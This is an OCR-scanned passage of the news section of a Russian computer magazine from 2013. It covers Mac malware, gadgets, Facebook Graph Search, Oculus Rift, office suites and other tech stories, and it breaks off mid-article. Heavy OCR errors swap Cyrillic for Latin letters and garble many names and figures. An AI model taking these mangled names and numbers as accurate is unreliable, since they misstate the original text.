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ЧЕРВИВЫЕ ЯБЛОКИ 



Каждый пользователь\Л/іпсіоѵѵ5давно привык, что в системе 
должен быть установлен антивирус. А каждый маковод уверен, 
что необходимости в этом нет. Убедить пользователя ОБ X в том, 
что его систему могутзаразить, довольно сложно. И это нему- 
дрено. Долгое время разработчики малвари обходили стороной 
операционную систему Арріе. Все, что мы видели, — это доволь- 
но жалкие ргоо^-оі-сопсері, демонстрирующие незатейливые 
способы заражения системы. Полумиллионный ботнет РІазЬРаке, 
который полностью состоял из Мас'ов, стал первым и лучшим 
доказательством того, что никакого иммунитета к зловреду 
у 05 X нет. За одной эпидемией последовали другие. Стало ясно, 
что угрозы для Мае- и ѴѴіпсІоѵѵз-пользователей мало чем отли- 
чаютсягтеже проблемы сзапуском недоверенных приложений, 
те же векторы атаки через сторонние компоненты (например, 
^ѵа),теже последствия неустановленных обновлений. Но нужно 
ли было появиться большому ботнету, чтобы эти проблемы на- 
конецвскрылись? 
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Ждем гонку открытых 
офисных пакетов: 
ЫЬгеОНІсе4ужеесть, 
аОрепОНІсе4 —будет 
летом. 



004 


МЕ6АЫЕѴѴ5 


013 


Ргоо*-о*-сопсерІ 




Все новое за последний месяц 




Очищаем оперативную памятьотулик 


012 


Колонка Стёпы Ильина 








Статические генераторы сайтов 







СОѴЕКБТОКѴ 



по/ История 

одного хакера 

Интервью с СІ50 РагаІІеІз 
Алексеем Смирновым 





МАЛ ВАРЬ ДЛЯ 05 X 


014 


Горячий парад Мас-ориентированной малвари 
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всё, в домике? Как бы не так. Читай анализ самых замет- 
ных эпидемий вредоносов для 05 Хза последний год. 
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БОЛЕЕ 50 МИЛЛИОНОВ РОУТЕРОВ 

уязвимы к атакам через ІІРпР, заявил 
Нй Мооге (создатель Меіазріоіі) и 
специалисты Карісі7. 



ПУЛЬТДУ ДЛЯ ТЕЛЕФОНА 

НТС ВЫПУСТИЛА СТРАННЫЙ ГАДЖЕТ 

□ сегодняшнем изобилии смартфонов, казалось бы, уже сложно 
чему-то удивиться — на рынке представлены аппараты всевоз- 
можных форм-факторов, характеристик и размеров. Не отстает 
от этого многообразия и рынок различных аксессуаров. Однако компании 
НТС удалось выпустить гаджет, до которого ранее не додумался никто. 

Устройство НТС Міпі представляет собой странную штуку, охарактери- 
зовать которую можно как пультДУ для телефона или даже телефон для... 
телефона (устройство несет в себе функцию гарнитуры). Пока новинку 
презентовали как аксессуар для смартфона НТС ВиКеЛІу, но в дальней- 
шем, возможно, подобными ДУ обзаведутся и другие аппараты. 

НТС Міпі общается со смартфоном при помощи ИРС или ВІиеІооІН, 
и функциональность устройства зависит от типа соединения. Так, через 
ЫЕС пользователь может просматривать на небольшом монохромном 
дисплее «лентяйки» сообщения, истории звонков или записи из органай- 
зера, хранящиеся в телефоне. Также возможно удаленно активировать 
камеру смартфона, например, чтобы сделать групповое фото со своим 
участием. В свою очередь, если соединение установлено по ВІиеІооіЬ, 

НТС Міпі превращается в оригинальную гарнитуру в виде мини-телефона, 
с помощью которой можно совершать звонки, даже не доставая из карма- 
на основной аппарат. 

Пока гаджет НТС Міпі ориентирован исключительно на рынок Китая. 




а 

Некоторые ком- 
ментаторыувидели 
вэтойтенденции 
отголоски эпохи 
КПК:тогдатоже 
считалось, что 
пользователю нужна 
связка из мощного 
карманногоком- 
пьютера и простого 
телефона. 




СИНХРОНИЗАЦИЯ ДАННЫХ 
ОТВІТТОРРЕІМТ 

ИНТЕРЕСНАЯ АЛЬТЕРНАТИВА ОБЛАЧНЫМ ХРАНИЛИЩАМ 

И ефицита хранилищ данных, позволяющих не только хра- 
нить, но и синхронизировать информацию между несколь- 
кимиустройствами, изданный моментявно не наблюда- 
ется. Однатолькотройка ОгорЬох, боодіе бгіѵе и Бкубгіѵе выглядит 
внушительно. Однако ВіГГоггепІ Іпс. конкурентов не побоялась 
и выпустила свое, достаточно оригинальное решение, пока в режи- 
метестирования. 

Приложение ВіГГоггепІ БупсАрр позволит пользователям синхро- 
низировать свои данные посредством Ьіиогепі-протокола с шифрова- 
нием. Программа совершенно бесплатна и, что очень важно, не имеет 
ограничений по объему хранимых данных. По сути, у ВіГГоггепІ полу- 
чилось создать простое, надежное и быстрое решение для обмена дан- 
ными на несколькихустройствах (аналогичным способом пользуется, 
к примеру, ЕасеЬоок для передачи информации между серверами). 

Функциональность строится познакомому всем принципу 
иоченьпохожа натотОгорЬох. Различие лишьвтом, что решение 
ВііТоггепІ не облачное, а значит, никакие третьи лица точно не име- 
ют доступа к пользовательским данным. Работаетновшество, 
как несложно понять, на базе Р2Р-технологий. Узнать подробности 
и опробовать приложение в деле можно здесь: ІаЬв.ЬіИоггепІ.сот/ 
ехрегітепІв/Бѵпс.ЫтІ . 




В США ВСТУПИЛО В СИЛУ РЕ- 
ШЕНИЕ, согласно которому 
разлочкателефона является 
преступлением, аналогич- 
ным переходу к другому 
оператору сотовой связи 
до истечения контракта. 




5УМВІАИ ОФИЦИАЛЬНО 

«МЕРТВ». Ыокіа подтвер- 
дила, что смартфон 808 
РигеѴіеж, вышедший про- 
шлым летом, стал послед- 
ним аппаратом на данной 
платформе. 




РЕКОРДНО СУРОВОЕ НАКА- 
ЗАНИЕ ДАЛИ ВИДЕОПИРАТУ 
ВСША— участник релиз- 
группы ІМАбіИЕ, снимав- 
ший «экранки» на камеру, 
Джеремия Перкинсполучил 
пятьлеттюрьмы. 




СМАРТФОНЫ НА БАЗЕ 
АНОКОЮ ЗАНИМАЮТ ПОЧТИ 
75% МИРОВОГО РЫНКА. 
Ктаким выводам пришли 
специалисты аналитической 
компании ЮС, изучив стати- 
стикупоставок. 




СМАРТФОНЫНАБАЗЕ 
ІШІШЦРНОНЕ могут стать 
первыми устройствами с 
предустановленной кон- 
солью. Послухам, вофисах 
сразу двух калифорнийских 
компаний началасьпаника. 
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ВЫШЛА 10$ 6.1. Арріе сообщает, что «шестерка» в общей сложности установлена уже на 300 миллионах устройств. 



КАК ПОЛУЧАТЬ МНОГО ДЕНЕГ 
И НИЧЕГО НЕ ДЕЛАТЬ? 

АУТСОРСИНГ — ВЕЛИКАЯ ВЕЩЬ! 

мешной и поразительный в своей наглости случай произошел 
недавно в США. Эта история стала достоянием общественно- 
сти благодаря посту в блоге компании Ѵегігоп, специалистов 
которой пригласили провести расследование. 

В некоей компании, название которой не разглашается, трудился 
один программист. Компания занималась инфраструктурами особой 
важности, так что все серьезно. Программист, которого Ѵегігоп называет 
просто Боб (разумеется, изменив имя), считался далеко не последним 
работником: он успешно строил карьеру и в год зарабатывал шестиз- 
начные суммы. Однако у компании появились смутные подозрения, ког- 
да в логах ѴРІЧ обнаружились следы посещений с ІР-адресов китайского 
диапазона. Разумеется, сначала подумали о корпоративном шпионаже, 
диверсиях и других страшных вещах. Хотя китайцы использовали 
для входа в систему учетную записьтого самого Боба, на него не пало 
никаких подозрений — грешили на какой-нибудь 0-сіау на его машине, 
мал варь и тому подобные вещи. Тогда Ѵегііоп попросили разобраться, 
в чем тут дело. 

Открывшаяся специалистам картина поражала. Нет, Боб не был 
шпионом, он был лентяем. Оказалось, что предприимчивый програм- 
мист очень не хотел работать. Он нанял консалтинговую компанию 
из Шэньяна, передал им все «пароли и явки» и даже отправил по почте 
аппаратный ключ, использовавшийся для двухфакторной аутенти- 
фикации. На его рабочем компьютере нашли сотни инвойсов, под- 
тверждавших, что Боб оплачивал услуги китайцев, передавая тем всю 
свою работу. А сам Боб в рабочее время сидел в РасеЬоок, читал Ресісііі 
и просматривал видеоролики с котиками. Разумеется, хитреца тут же 
уволили, заодно оставив без работы и китайских аутсорсеров. 




СОЦИАЛЬНЫЙ 

ПОИСКОТЕАСЕВООК 

СКАРН 5ЕАРСН, НА КОТОРЫЙ ВОЗЛАГАЮТ БОЛЬШИЕ НАДЕЖДЫ 

ак известно, до недавнего времени поиск в РасеЬоок был край- 
не примитивным. Довольно долго от социальной сети ждали 
действий в этом направлении, ведь, запустив свой поисковик, 
РасеЬоок смогла бы проиндексировать тонны данных, к которым поис- 
ковые роботы и тот же боодіе попросту не имеют доступа. Согласись, это 
серьезная сила. И вот момент истины настал — РасеЬоок запустила соци- 
альный поиск, получивший название БгарЬ БеагсЬ. Давай посмотрим, 
кто и что за этим стояло. Для начала стоит сказать, что от веб-поиска 
социальный поиск сильно отличается. Он отображает личную инфор- 
мацию, которая обычно не проникает в Сеть, — в него попадает только 
информация, открытая для просмотра на страницах пользователей 
РасеЬоок. Социальный поиск разработан таким образом, что дает ответы, 
а не ссылки на ответы. Поисковик сфокусирован вокругчетырехтипов 
использования: люди, фото, места и интересы. К примеру, ты можешь со- 
ставлять списки людей по различным критериям: все сотрудники фирмы 
X, которым нравится группа У. Кто находится в баре N вместе со мной 
и тоже любит фильм М? Также можно найти фотографии определенного 
места по заданным координатам или по текстовому описанию объек- 
та. Цукерберг уверяет, что для РасеЬоок это своего рода возвращение 
к корням — когда социальная сеть только начиналась, еще в рамках 
колледжа, подобные функции там уже были. 

Работу над бгарЬ БеагсЬ вел Ларе Расмуссен, ранее сотрудник Боодіе, 
трудившийся над такими проектами, как боодіе Марз (идею которого 
он начал воплощать в небольшой компании, впоследствии купленной 
поисковым гигантом) и ѴѴаѵе. Когда Расмуссен присоединился к «по- 
исковой» команде РасеЬоок, те уже размышляли, как создать поиск, 
который мог бы отвечать на простые вопросы вроде: «Какие книги 
читают мои друзья? Какой итальянский ресторан по-настоящему им 
нравится?» Команде пришлось решать, фокусироваться ли при создании 
поиска на наиболее популярных вопросах или же создавать сложный 
поисковый движок, в теории способный ответить на любые вопросы. 
Второе виделось малореальным, однако Цукербергдал понять, что было 
бы замечательно реализовать именнотакой механизм. И Расмуссен 
начал работу, взяв себе в помощь еще одного экс -сотрудника боодіе Тома 
Стоки. Помимо них, в команде собрались пятьдесят инженеров и два 
лингвиста. Уже на первых порах стало ясно, что бгарЬ БеагсЬ должен 
оказать на РасеЬоок серьезное влияние: строка поиска стала больше, 
превратившись в крупный баннер вверху страницы, по бокам от которо- 
го расположились иконки, и даже имя компании пропало с домашней 
страницы, оставив после себя лишь стилизованную Р. Также стало ясно, 
что поиск сильно отличается от привычного веб-поиска, где пользо- 
ватели привыкли оперировать короткими ключевыми словами. бгарЬ 
БеагсЬ, напротив, предполагает длинные и подробные запросы, на- 
писанные обычным, человеческим языком, и чем конкретнее, тем лучше. 

В борьбе боодіе и РасеЬоок за доминирующее положение в интернете 
уже давно стало очевидно, что компании будут пытаться выбить почву 
из-под ног другу друга. Это было понятно еще после запуска боодіе-»-, но 
с запуском бгарЬ БеагсЬ борьба вот-вот дойдет до самой яркой фазы, до 
своего абсолюта. Интересно, чем это все закончится. 





РАССТАВАНИЕ С КНОПКОЙ «ПУСК» ОКАЗАЛОСЫЯЖЕЛЫМ 




БОЛЕЕ ТРЕХ МИЛЛИОНОВ РАЗ СКАЧАЛИ ПРОГУ 
5ТАЯТ8, ВОЗВРАЩАЮЩУЮ «ПУСК» В ЖШ00Ж5 8 
НА МЕСТО. У АНАЛОГОВ СКАЧИВАНИЙ НЕ МЕНЬШЕ 
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ПРОПУСКНАЯ СПОСОБНОСТЬ Ц5В3.0 ВЫРАСТЕТ Д0 1 0 ГБИТ/С, обещают участники Ц5В3.0 Рготоіег бгоир. 



ЯЗЫК ПРОГРАММИРОВАНИЯ 
НААРАБСКОМ 



ГМ 50РРУ, ОАѴЕ, УОІІ 
НАѴЕ САЫСЕР. БОБ 



ОКАЗЫВАЕТСЯ, КОД БЫВАЕТ НЕ ТОЛЬКО НА ЛАТИНИЦЕ 




АІЬнеединствен- 

ный необычный 

сяингвистической 

точки зрения язык 

программирования. 

Варабскихстранах 

имеетхождение 

языкАММОША 

(тоже на основе 

арабского), также 

можновспомнить 

бухгалтерские 

программы 1С, где 

ивовсекириллица. 



эмси Нассер, ученый, сотрудник ЕуеЬеат ІесЬпоІоду и программист, 
создал удивительную для западного мира штуку — язык программиро- 
вания на арабском. Свою разработку Нассер назвал АІЬ, что в переводе 
с арабского означает «сердце». 

Зачем это нужно? Автор АІЬ утверждает, что его главная цель — преодоление 
лингвистического барьера. Дескать, для многих специалистов «англоязыч- 
ность» программирования представляет серьезную проблему. Нассер расска- 
зывает, что на заре его собственной карьеры необходимость учить английский 
сильно его удивила, и стех пор он уверен, что программирование должно быть 
доступно абсолютно любому человеку, независимо оттого, владеет ли тот ино- 
странными языками. С этим, вероятно, можно поспорить, все же на сегодня уже 
сложились определенные стандарты, в том числе и относительно английского 
языка. Однако АІЬ интересен как явление и, прости за высокий штиль, «произ- 
ведение искусства». Здесь все языковые конструкции и инструкции записы- 
ваются с помощью символов и по правилам арабского языка — арабской вязи, 
справа налево. При этом Нассер уверяет, что его язык может быть использован 
для любых типов вычислений и вообще ничем не хуже конкурентов. В будущем 
креативный ученый собирается выпустить набор библиотек и АРІ, которые будут 
обращаться к АІЬ через привычные для западных программистов конструкции, 
такие как Іипсііоп, (ог, іЬ 




СУПЕРКОМПЬЮТЕР НАУЧИЛИ ПЛОХОМУ 

В озданный как часть проекта БеерСІА суперкомпью- 
тер ѴѴаІБОп от компании ІВМ уже не раз попадал 
в заголовки новостей. ѴѴаІзоп оснащен системой 
искусственного интеллекта, которую разработала группа 
исследователей под руководством Дэвида Феруччи. Основная 
задача суперкомпьютера — понимать вопросы, сформули- 
рованные на естественном языке, и находить на них ответы 
в своей базе данных. Благодаря умению распознавать смысл 
предложений и вопросов, а также отвечать на них, используя 
датамайнинг, ѴѴаІзоп уже выиграл у чемпионов известной 
телевикторины ^орагбу (ее российский аналог — «Своя 
игра») в 2011 году. 

Недавно для «расширения кругозора» компьютер решили 
познакомить с ѴѴікіреЬіа и ІІгЬап Оісііопагу (известной энци- 
клопедией англоязычного жаргона и сленга), что оказалось 
ошибкой. Как рассказал в интервью СМИМопеу Эрик Браун — 
один из работающих над проектом специалистов, вместо того 
чтобы научиться лучше понимать людей и находить дополни- 
тельный смысл в их словах, компьютер научился скверносло- 
вить, а на серьезные вопросы мог ответить незамысловатым 
«0М6, ЮН». Браун пояснил, что такой казус произошел из-за 
того, что ѴѴаІзоп неспособен распознать, какой смысл того 
или иного слова является приличным, а какой нет. В итоге 
команда проекта была вынуждена вручную очистить память 
суперкомпьютера, стирая оттуда следы ѴѴікіресІіа и ІІгЬап 
Оісііопагу. Дополнительно ѴѴаІзоп оснастили фильтром, дабы 
впредь в его «речь» не прорывались ругательства и сетевые 
жаргонизмы, вроде ВОРІ_ и ІОІ_. 





НОКІА — САМАСЕБЕЗЛОБ- 
НЫЙ БУРАТИНО. Компания 
привлекла вниманиелюбите- 
лей ЗО-принтеров, опублико- 
вав чертежи чехла для Иокіа 
І_итіа 820. Однако в тесте, про- 
веденном ресурсом ТИе Ѵегде, 
чехол оказался редкостной 
гадостью. Стенки оказались 
слишком тонкими, и вокруг 
отверстий камеры и кнопок 
образовывалисьтрещины. 
Впрочем, несмотря на очевид- 
ные недостатки, идея остается 
запредельно крутой. 




РИО ОБОГНАЛ 6ІР. В январе 
файлы РИО встречались 
на 62,4% всех веб-сайтов 
в Сети, а файлы ОІР — на 62,3%, 
сообщает ІЛ/ЗіесЬз.сот. 




ВАСКТКАСК БУДЕТ ПЕРЕИМЕ- 
НОВАН В КАП І.ІІШХ и получит 
множество изменений: от- 
ныне дистрибутив перебирается 
на йеЫап. Точная дата выхода 
пока неизвестна. 



006 



ХАКЕР 03/170/2013 





БОНУ ОКОНЧАТЕЛЬНО ОТКАЗАЛ АСЬ ОТ НОСИТЕЛЕЙ МІНЮІБК. Последние поставки устройств для них назначены на текущий месяц. 



ОЧКИ ВИРТУАЛЬНОЙ 
РЕАЛЬНОСТИ НЕ ВЫМЕРЛИ 

ВСЕ НОВОЕ — ХОРОШО ЗАБЫТОЕ СТАРОЕ 




□ дно время шлемы виртуальной реаль- 
ности были довольно распростра- 
ненной, хотя и достаточно дорогой 
игрушкой. Затем интерес к ним схлынул, 
пользователи продолжили смотреть в свои 
мониторы, и казалось, что лежать этому витку 
прогресса на полках музеев... Но нет. С прихо- 
дом дополненной реальности, ажитацией вокруг 
боодіе 6ІЭ55 и подобных устройств об этой теме 
вспомнили, к ней вернулись. 

Очень прикольное устройство должно выйти 
на рынок в ближайшее время. Называется эта 
странная помесь очков с маской для сна Осиіиз 
РіК. Проекту на самом деле уже почти год — про- 
шлым летом он сорвал настоящий джек-пот 
на Кісквіагіег, собрав вместо нужных разработ- 
чикам 250 тысяч долларов более двух с полови- 
ной миллионов! 

Итак— в чем соль? Осиіиз ПіД весит всего 230 
граммов и использует стереоэффект (который 
в последнее время, с легкой руки рекламщи- 
ков, все называют 30). Устройство фактически 
использует хитрую технологию — один дисплей 
здесь разделен на две половины, по одной 
на каждый глаз. Благодаря этому усталость глаз, 
характерная для очков с активным затвором, 
и артефакты, связанные с поляризацией, практи- 
чески сводятся на нет. Прототип Осиіиз ПіК рабо- 
тает на разрешении 1 280 * 800 (то есть по 640 * 800 
на каждый глаз), а поле зрения составляет 100 
градусов, что очень неплохо для такого устрой- 
ства. За движениями головы аппараттакже 
следит — как же иначе синхронизироваться 
с происходящим на экране? Слежение происхо- 
дит на частоте 1 000 Гц и включает акселерометр, 
гироскоп и магнитометр, чтобы компенсировать 
дрейф. Уже сейчас, согласно отзывам с выставок, 
система работает весьма неплохо, но до релиза 
ее обещают улучшить еще. Питается устройство 
от 115В, встроенного звука (пока?) нет. 

Но такой гаджет будет никому не нужен, если 
его не будут поддерживать игры. К счастью, 
благодаря оглушительному успеху на Кісквіагіег, 
разработка сумела заинтересовать игровую инду- 
стрию. Джон Кармак (сооснователь и совладелец 
компании ісі БоКѵѵаге) уже активно содействует 
проекту, обещая выпустить Ооот 3: ВР6 ЕсМіоп 



для Осиіиз ПіК. Известный разработчик игр Крис 
Робертс заявил, что устройство будет поддер- 
живаться в БіагСіІігеп. Кроме того, о поддержке 
очков виртуальной реальности уже заявлено 
для игр Теат Рогігевв 2 и Наѵѵкеп. 

Поставки наборов для разработчиков начнут- 
ся уже этой весной. К маю компания рассчитывает 
произвести примерно Ютысяч устройств. Цена 
ОсиІизРіДдля разработчиков составляет около 
300 долларов, но ожидается, что розничная 



стоимость устройства на первых порах будет 
выше — порядка 1000 зеленых денег. Впрочем, 
по сравнению с профессиональными устройства- 
ми подобного рода это совсем не много. А если 
сравнивать с ценой хорошего монитора, то цифры 
и вовсе получаются весьма близкие. 

Чтобы оценить всю прелесть разработки, 
советую посетить официальный сайт проекта 
І осиіизѵг.сот ) и посмотреть видео. Воттогда-то 
и придет ощущение, что будущее уже здесь. 



ПОЧЕМУ В ІЖІХ-СИСТЕМ АХ ДОМАШНЯЯ ПАПКА ОБОЗНАЧАЕТСЯ «-»? 



НА ТЕРМИНАЛАХ АОМ-ЗА, 
РАСПРОСТРАНЕННЫХ В 70-Е ГОДЫ, 
ЗНАК «~» И СЛОВО «НОМЕ» 
РАСПОЛАГАЛИСЬ НА ОДНОЙ КНОПКЕ 
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С 900 ДО 5000 ЧЕЛОВЕК ВОЗРАСТЕТ ЧИСЛЕННОСТЬ ШТАТА КИБЕРОТДЕЛА, что находится в ведении Минобороны США. 



ПАРОЛИ — ЭТО ПРОШЛЫЙ ВЕК 

В 60061-Е РАЗМЫШЛЯЮТ НАД АППАРАТНОЙ ЗАЩИТОЙ ДАННЫХ 

колько ни пиши пользователю предупреждений, сколько ни убеждай 
его в том, что пароль не должен быть короче 6-8 символов, должен 
состоять из случайных цифр и букв и вообще «чем сложнее, тем луч- 
ше», — предупреждения эти почти недействуют. Ктомуже, дажеесли пароли 
хорошие, разные и надежные, это еще не гарантия защиты от взлома. 

Корпорация боодіе, как всегда, находится на передовой прогресса, так 
что ситуация с паролями не могла их не заинтересовать. В боодіе провели ряд 
исследований, в ходе которых пришли куже известному, но всеже не широко рас- 
пространенному методу использования аппаратных ключей. В качестве одного 
из вариантов предлагается использовать миниатюрные криптографические 
карты ѴиЬісо. Вставляешьтакой «брелок» в ІІ5В-порт, и зарегистрироваться 
на новом сайте или выполнить вход в аккаунт боодіе можно буквально одним кли- 
ком, вообще не набирая никаких паролей. В боодіе подобный способ аутентифи- 
кации сравниваютс открытием двери ключом. Ав будущем предлагаюти вовсе 
перейти на беспроводные протоколы, а защитуусилить, скажем, дополни- 
тельным введением одноразового кода. Ктомужеуже сейчас многие эксперты 
высказывают предположения, что носимая электроника получит широкое рас- 
пространение в самом скором времени. Так что для большего удобства встроить 
подобный аппаратный ключ будет возможно в одежду, бижутерию и так далее. 





В последнее 
время популярность 
двухфакторной 
аутентификации 
только растет, боодіе 
отмечает, что после 
громкого взлома 
журналиста Мэта 
Хонаназадвадня 
число пользователей 
двухфакторной ау- 
тентификации боодіе 
возросло начетверть 
миллиона. 




іоЬ* 



Н#Ір 



ГасеЬоок 



362к 



ПРЕДЪЯВИТЕ 

ДОКУМЕНТИКИ 

Ш5ТА6Я АМ ПОТРЕБОВАЛ У 
ПОЛЬЗОВАТЕЛЕЙ ПАСПОРТА 

читаешь, только в Китае или Северной Корее 
люди выходят в Сеть по паспортам? Вот и нет. 
Недавно документы у пользователей потребовал 
Іпвіадгат, чем немало перепугал юзеров, посеяв в их рядах 
настоящую панику. 

Как известно, Іпвіадгат, в отличие от РасеЬоок, нетре- 
буетобязательногоуказания настоящих данных (таких 
как имя-фамилия), однако вскоре после вступления в силу 
новых правил использования сервиса Іпзіадгат последний 
вдругпопросилунекоторых пользователей предоста- 
витьв юридический отдел компании РасеЬоок«паспорт 
государственного образца». Люди разумно предположи- 
ли, что странные письма стакой просьбой— новая форма 
мошенничества с целью выманитьу доверчивого населения 
сканы документов, нооказалисьнеправы.Какпояснили 
представители РасеЬоок, «Іпбіадгат изредка удаляет акка- 
унты за нарушениеусловийпользовательскогосоглашения 
и, взависимостиотнарушения, может потребоватьзагрузки 
удостоверения личности для верификации». Учитывая, 
что теперь Іпвіадгат может«отказать в предоставлении 
услуги пользователю в любое время по любой причине», 
ситуация печальная. 





КОМПАНИЯІНТЕІ-БОЛЬШЕ 
НЕ БУДЕТ ПРОИЗВОДИТЬ МА- 
ТЕРИНСКИЕ ПЛАТЫ ДЛЯ ПК. 
Хотя ІпіеІ и проработала 
более двадцати летв данной 
области, подразделение 
былоубыточным. 




ИА5А И ТОРСООЕЯ ПРО- 
ВОДЯТ СОВМЕСТНЫЙ 
КОНКУРС. Автор лучшего 
алгоритма для движе- 
ния солнечных панелей 
на МСКполучитІОтысяч 
долларов: 1орсогіег.сот/І55 . 




МІСК050РТ5ЕСІШІТѴ 
Е55ЕИТІАІ.5 в очередной 
раз не сумел пройти АѴ-ІезІ. 
В МісгозоН, в свою очередь, 
заявили, чтосчитают 
результаты теста недосто- 
верными. 




АНГЛОЯЗЫЧНАЯЖІКІРЕОІА 
ТЕРЯЕТ АВТОРОВ, под- 
считали в Миннесотском 
университете. Если в 2007 
году авторов насчитывалось 
56 тысяч, то сейчас их лишь 
35тысяч. 




АІ^АУБШНОУАТтО анонси- 
ровали МеСат — мини-ква- 
дрикоптер с веб-камерой 
за 49 долларов. Компания 
будет лицензировать дизайн 
другим производителям, 
дата выхода неизвестна. 
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КОМПАНИИ КЕ5ЕАКСН ІН МОТІОН БОЛЬШЕ НЕ СУЩЕСТВУЕТ. С выходом ВІаскВеггу 10 производитель сменил свое название на ВІаскВеггу. 



«ЗВЕЗДУ СМЕРТИ» 

СТРОИТЬ НЕ БУДУТ 

ВОТ КАК НУЖНО ОТВЕЧАТЬ НА ПЕТИЦИИ! 

ряд л и шутники, создавшие на сайте Белого дома США петицию 
за началофинансирования и строительства «Звезды смерти», 
полагали, что их шутка получиттакой резонанс, да еще итакой 
клевый официальный ответ. 

Сервисдля подачи петиций открылся в Штатахсовсем недавно, 
и главное правилоего работытаково — если петиция набираетболее 25 
тысяч голосов, на нее должен бытьдан официальный ответ. Поклонников 
БіагѴѴагз в Америке много, так что со сбором голосов за начало строи- 
тельства «Звезды смерти» к 2016 году проблемы не возникло. Однако 
вряд ли кто-то ожидал серьезного ответа, а его дал Пол Шоукросс, руко- 
водитель Департамента науки и космоса Административно-бюджетного 
управления Белого дома. Позволь привести отрывки из официального 
текста. Основныеаргументы против: 

«Строительство „Звезды смерти" оценивается более чем 
в 850 000000000 000000долларов. Мыупорнотрудимся, чтобыуменьшить 
дефицит, а не расширить его. Правительство не поддерживает взрыв пла- 
нет. Почему мы должны тратить бесчисленные доллары налогоплательщи- 
ков на „Звезду смерти" с фундаментальным недостатком, которым может 
воспользоваться противник на одноместном корабле?» 

Затем Шоукросс призвал людей посмотреть вокруг и заметить, что мы 
все уже живем в будущем. У человечества уже есть МКС, марсоходы, дрой- 
ды, а космос осваиваютуже нетолько правительства, но и частные компа- 
нии. Заканчивалось обращение словами о том, что «Звезда смерти» ничто 
по сравнению с мощью Силы, а та заключена в науке, технике и математике. 
Пожалуй, еще никогда 25тысяч человек не былитакдовольны отказом. 




На всякий случай напоминаем: «Звезда смерти» — боевая космическая станция, оснащенная 
энергетическим оружием, способным уничтожать целые планеты. 



ЭБЕН АПТОН, ОДИН ИЗ СОЗДАТЕЛЕЙ КА5РВЕККѴРІ, ПРИЗНАЛСЯ: 



«МЫ ЧЕСТНО СЧИТАЛИ, 

ЧТО ПРОДАДИМ ТЫСЯЧУ 
УСТРОЙСТВ. НУ МОЖЕТ БЫТЬ, 
ДЕСЯТЬ ТЫСЯЧ, НО ЭТО УЖЕ 
В САМЫХ ДИКИХ МЕЧТАХ» 



РАЗВИТИЕ ЫВРЕОЕЕІСЕ 
ИОРЕІМОЕЕІСЕ 

У ПОЛЬЗОВАТЕЛЕЙ МОЖЕТ ПОЯВИТЬСЯ ВЫБОР 

тех пор как ОрепОКісе.огд вместе с командой и всеми 
наработками отошел под крыло Огасіе, а затем в стане 
разработчиков случился раскол, прошло уже два 
с половиной года. Разделившиеся свободные офисные пакеты 
продолжают работать, обзаводиться новыми версиями и разви- 
ваться. Сейчас как раз и ЫЬгеСШісе, и ОрепОКісе готовят для нас 
кое-что новенькое, о чем я и хочу тебе рассказать. 

иЬгеОКісе, развивающийся под присмотром некоммерче- 
ской организации ТЬе Роситепі Роипсіаііоп, совсем недавно 
обновился до версии 4.0. Одной из самых заметных фишек 
стала поддержка тем оформления Ріге^ох (Регзопаз). Проведе- 
на долгожданная чистка кода, в которой так нуждается почти 
30-летняя кодовая база проекта (напомним, что прародителем 
ОрепСЖісе был немецкий офисный пакет БіагСШісе, разра- 
ботка которого началась в 1 984 году). Добавлена интеграция 
с СМБ через интерфейс СМІ5. Пользователи *піх получили 
интеграцию с почтовыми клиентами. Кроме того, 1_іЬге(Жісе 
4.0 поддерживает все форматы файлов для конструктора 
векторных электронных схем Ѵібіо и стал быстрее работать 
с форматами СЮБ и РТР. 

В свою очередь, АрасЬе ОрепОМісе (тактеперь называется 
оригинальный офисный пакет) собирается слиться с кодовой 
базой другого офисного пакета І_оІиз БутрЬопу (был передан 
АрасЬе компанией ІВМ). Все полезное изданного пакета войдет 
в состав ОрепСЖісе 4.0. Впрочем, работа по слиянию началась 
прошлым летом, поэтому, если не возникнет форс-мажоров, 
пакет версии 4.0 выйдет летом этого года. 

Из интересного в пакете І_оШз БутрЬопу можно отметить 
улучшенный интерфейс на основе вкладок, панель задач (Тазк 
Рапе), большую коллекцию шаблонов и клипарта, возможность 
выполнения ѴВА-скриптов, поддержку асинхронной загрузки 
документов. Кроме того, в ЬоШз БутрЬопу была проведена 
огромная работа по обеспечению совместимости с форматами 
офисного пакета МБ ОЖсе. Словом, полезного много. 

Одновременно с этим объявлено о переходе на новую 
лицензию. Вместо АрасЬе Ысепзе будет использоваться МогіІІа 
РиЫіс ЫсепБе — нечто среднее между семействами лицензий 
6Р1_ и В50. МР1_ позволяет применять в производных проектах 
компоненты под другими лицензиями (вплоть до пропри- 
етарных) при условии, что оригинальный код будет оставаться 
открытым. По словам разработчиков ЫЬгеСШісе, это изменение 
позволит сделать проект более привлекательным для коммер- 
ческих разработчиков, что должно придать импульс мобиль- 
ным и веб-продуктам на базе пакета. 
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МЕ6АЫЕѴѴ5 



4464 ТВИТА С ХЕШТЕГОМ#ГОВНОРЕЕСТР выявлено за месяц после запуска реестра запрещенных сайтов, подсчитали в ѴѴоЬоІ. 



ИСКУССТВЕННЫЙ 
НОС ДЛЯТВОЕГО ІРНОІЧЕ 



СТЕГАНОГРАФИЯ В 5КѴРЕ 

СПРЯТАТЬ ДАННЫЕ МОЖНО ВЕЗДЕ 



АКСЕССУАР ДЛЯ НАСТОЯЩИХ ГИКОВ 




Дветысячи сенсоров — именно таким количеством управляет чип, в то время 
как у человека имеется всего около четырехсот аналогичных рецепторов. 



овеем недавно мы знакомили тебя с футурологическим про- 
гнозом от ІВМ, где говорилось, что в ближайшие пять лет могут 
появиться устройства, вдесятки раз превосходящие чувстви- 
тельностью человеческий нос. Такие девайсы, по мнению ІВМ, смогли 
бы по запаху определять состав блюд, помогать в выборе продуктов 
и даже диагностировать различныеболезни на раннихстадиях. 

Это уже не первый случай, когда ІВМ попадает в точку и хочется 
сказать: «как в воду глядели». Американский стартап Асіатапі 
ТесЬпоІодіез недавно сообщил о создании «искусственного носа». 
Каки прогнозировала ІВМ, чип с набором сенсоров сможет«нюхать» 
воздух, оповещая хозяина смартфона о несвежем дыхании, воз- 
можных проблемах со здоровьем, о количестве затрачиваемых 
калорий итак далее. Да-да, именно «смартфона», так как предпо- 
лагается, что в продажу разработка поступит в виде подключаемого 
к іРЬопе устройства-аксессуара. Массовое производство чипов уже 
стартовало, однако сами гаджеты и приложения для них появятся 
не раньше чем через год-два. Ожидается, что цена такого «носа» 
составит около ста долларов. 




□ езультаты крайне любопытного исследования опублико- 
вала польская команда изУниверситетатехнологий ите- 
лекоммуникаций Варшавы. Они предлагают использовать 
